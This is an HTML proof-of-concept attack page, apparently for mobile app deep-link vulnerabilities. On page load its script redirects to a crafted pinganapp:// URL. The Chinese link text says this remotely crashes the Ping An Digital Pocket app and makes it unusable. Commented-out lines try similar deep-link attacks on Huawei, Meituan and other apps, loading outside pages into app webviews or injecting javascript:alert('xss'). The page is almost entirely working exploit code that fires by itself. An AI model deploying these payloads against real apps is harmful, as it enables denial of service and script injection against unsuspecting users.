</head>
<body>
<h1><div id="content">Remote Attack Poc</div></h1>

<a href="pinganapp://commonvue.pab.csii.com/openwith?url=hack:you">远程拒绝攻击，导致平安数字口袋APP不可用</a>


<script>	
function attack(){
	//document.location.href ="hiapp://com.huawei.appmarket?activityName=activityUri|webview.activity&params={'params' : [ { 'name' : 'uri', 'type' : 'String', 'value' : 'internal_webview' }, { 'name' : 'url', 'type' : 'String', 'value' : 'meituanlens://www.meituan.com/commonscanner' } ] }&channelId=1";
    // document.location.href ="imeituan://alita.waimai.meituan.com/autotest";
   //document.location.href ="amcfm://extra/browseL?title=attack&url=https://justingangha.github.io/easyhtml/showjs.html";
   // document.location.href ="amcfm://extra/browseL?title=attack&url=https://justingangha.github.io/easyhtml/WRK.html";
   //document.location.href ="amcfm://extra/browseL?title=attack&url=javascript:alert('xss')";
   //document.location.href ="amchqt://extra/browseL?title=attack&url=javascript:alert('xss')";
 //   document.location.href ="arouter://m.aliyun.com";
 document.location.href ="pinganapp://commonvue.pab.csii.com/openwith?url=hack:you";

}
attack();
</script>


</html>
